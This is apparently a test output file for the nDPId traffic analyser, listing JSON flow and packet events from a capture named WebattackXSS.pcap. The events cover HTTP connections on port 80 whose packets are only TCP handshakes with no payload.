+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347640199,"flow_last_seen":1499347640199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347640199,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1499347640199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347640199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81CZAAD4G8amsEAABwKgKMufaAFCvK6yIAAAAAKACchChOwAAAgQFtAQCCAoBO3iuAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":2,"flow_last_seen":1499347640199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347640199,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ59rwV\/OuryusiaAScSBwCwAAAgQFtAQCCAoD5UojATt4rgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5632,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":3,"flow_last_seen":1499347640200,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347640200,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01CdAAD4G8bCsEAABwKgKMufaAFCvK6yJ8Ffzr4AQAOUPEwAAAQEICgE7eK4D5Uoj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347641440,"flow_last_seen":1499347641440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347641440,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1499347641440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347641440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tE5AAD4GEYKsEAABwKgKMufoAFB3dM2qAAAAAKACchC2jAAAAgQFtAQCCAoBO3nkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":2,"flow_last_seen":1499347641440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347641440,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5+hNQiold3TNq6AScSDwxQAAAgQFtAQCCAoD5UtZATt55AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":3,"flow_last_seen":1499347641442,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347641442,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tE9AAD4GEYmsEAABwKgKMufoAFB3dM2rTUIqJoAQAOWPzQAAAQEICgE7eeQD5UtZ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347642716,"flow_last_seen":1499347642716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347642716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1499347642716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347642716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SnNAAD4Ge12sEAABwKgKMuf2AFDcdDFQAAAAAKACchDsmQAAAgQFtAQCCAoBO3sjAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":2,"flow_last_seen":1499347642716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347642716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5\/aPKcRJ3HQxUaAScSBJiAAAAgQFtAQCCAoD5UyYATt7IwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":3,"flow_last_seen":1499347642717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347642717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnRAAD4Ge2SsEAABwKgKMuf2AFDcdDFRjynESoAQAOXojwAAAQEICgE7eyMD5UyY"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347645232,"flow_last_seen":1499347645232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347645232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1499347645232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347645232,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rz5AAD4GFpKsEAABwKgKMugQAFBzf9KmAAAAAKACchCxqQAAAgQFtAQCCAoBO32YAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5673,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":2,"flow_last_seen":1499347645232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347645232,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6BD8Et+tc3\/Sp6AScSCD1QAAAgQFtAQCCAoD5U8NATt9mAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5675,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":3,"flow_last_seen":1499347645234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347645234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rz9AAD4GFpmsEAABwKgKMugQAFBzf9Kn\/BLfroAQAOUi3QAAAQEICgE7fZgD5U8N"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347646486,"flow_last_seen":1499347646486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347646486,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1499347646486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347646486,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uWhAAD4GDGisEAABwKgKMugeAFCoNce5AAAAAKACchCGmQAAAgQFtAQCCAoBO37RAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":2,"flow_last_seen":1499347646486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347646486,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6B6AVzWvqDXHuqAScSB9RgAAAgQFtAQCCAoD5VBGATt+0QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":3,"flow_last_seen":1499347646488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347646488,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uWlAAD4GDG+sEAABwKgKMugeAFCoNce6gFc1sIAQAOUcTQAAAQEICgE7ftID5VBG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347647733,"flow_last_seen":1499347647733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1499347647733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347647733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cdhAAD4GU\/isEAABwKgKMugsAFDFxvHRAAAAAKACchA9qgAAAgQFtAQCCAoBO4AJAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":2,"flow_last_seen":1499347647733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347647733,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6CyQ1\/Exxcbx0qAScSBnHAAAAgQFtAQCCAoD5VF+ATuACQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":3,"flow_last_seen":1499347647734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347647734,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cdlAAD4GU\/+sEAABwKgKMugsAFDFxvHSkNfxMoAQAOUGJAAAAQEICgE7gAkD5VF+"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347650289,"flow_last_seen":1499347650289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347650289,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1499347650289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347650289,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qjtAAD4GG5WsEAABwKgKMuhGAFAFSiizAAAAAKACchDErAAAAgQFtAQCCAoBO4KIAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5716,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":2,"flow_last_seen":1499347650290,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347650290,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6EbKc6N+BUootKAScSD\/tgAAAgQFtAQCCAoD5VP9ATuCiAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":3,"flow_last_seen":1499347650292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347650292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qjxAAD4GG5ysEAABwKgKMuhGAFAFSii0ynOjf4AQAOWevQAAAQEICgE7gokD5VP9"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347651555,"flow_last_seen":1499347651555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347651555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1499347651555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347651555,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NDJAAD4GkZ6sEAABwKgKMuhUAFBjE7f2AAAAAKACchDWVQAAAgQFtAQCCAoBO4PEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":2,"flow_last_seen":1499347651556,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347651556,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6FRdfw4zYxO396AScSASYwAAAgQFtAQCCAoD5VU6ATuDxAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":3,"flow_last_seen":1499347651561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347651561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NDNAAD4GkaWsEAABwKgKMuhUAFBjE7f3XX8ONIAQAOWxaQAAAQEICgE7g8UD5VU6"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347654065,"flow_last_seen":1499347654065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347654065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 